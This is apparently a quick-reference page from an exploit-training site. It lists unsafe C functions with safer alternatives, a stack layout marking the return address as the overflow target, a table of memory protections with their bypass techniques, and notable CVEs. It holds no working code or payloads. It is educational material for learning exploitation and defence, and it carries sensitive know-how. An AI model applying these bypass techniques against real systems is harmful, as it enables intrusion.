Exploit Foundations
Challenge Gallery
Quick Reference
Vulnerable C Functions and Safe Alternatives
| Vulnerable | Problem | Safe Alternative |
|---|---|---|
gets(buf) |
No length limit at all | fgets(buf, size, stdin) |
strcpy(dst, src) |
Copies until null, no size check | strncpy(dst, src, n) |
sprintf(buf, fmt, ...) |
No output size limit | snprintf(buf, size, fmt, ...) |
scanf("%s", buf) |
Reads until whitespace, no limit | scanf("%63s", buf) (width specifier) |
strcat(dst, src) |
Appends with no size check | strncat(dst, src, n) |
x86-64 Stack Layout (growing downward)
Higher addresses
+----------------------------+
| caller's stack frame |
+----------------------------+
| return address [8 B] | <- overwrite target
+----------------------------+
| saved RBP [8 B] | <- frame pointer
+----------------------------+
| local variables | <- buf lives here
| char buf[32] [32 B] | <- overflow starts here
+----------------------------+
Lower addresses (stack grows down)
Offset from buf to return address:
32 (buffer) + 8 (saved RBP) = 40 bytes
Protection Mechanisms
| Protection | What It Blocks | Bypass Technique |
|---|---|---|
| Stack Canary | Buffer overflow → return address overwrite | Leak canary value via format string or info leak |
| NX / DEP | Executing injected shellcode on stack | ROP (Return-Oriented Programming) — reuse existing code |
| ASLR | Hardcoded addresses in exploits | Info leak to discover real addresses at runtime |
| PIE | Fixed binary base address | Info leak or partial overwrite |
| RELRO (Full) | GOT overwrite attacks | Target other writable memory |
Notable CVEs
| CVE | Name | Year | Vulnerability Class |
|---|---|---|---|
| CVE-2014-0160 | Heartbleed | 2014 | Buffer over-read (missing bounds check in OpenSSL) |
| CVE-2014-6271 | Shellshock | 2014 | Code injection (Bash environment variable parsing) |
| CVE-2021-44228 | Log4Shell | 2021 | Remote code execution (JNDI injection in Java logging) |
| CVE-2017-0144 | EternalBlue | 2017 | Buffer overflow (Windows SMBv1, used by WannaCry) |
| CVE-2016-5195 | Dirty COW | 2016 | Race condition (Linux kernel copy-on-write) |
| CVE-2024-3094 | XZ Backdoor | 2024 | Supply chain (malicious code injected into xz-utils) |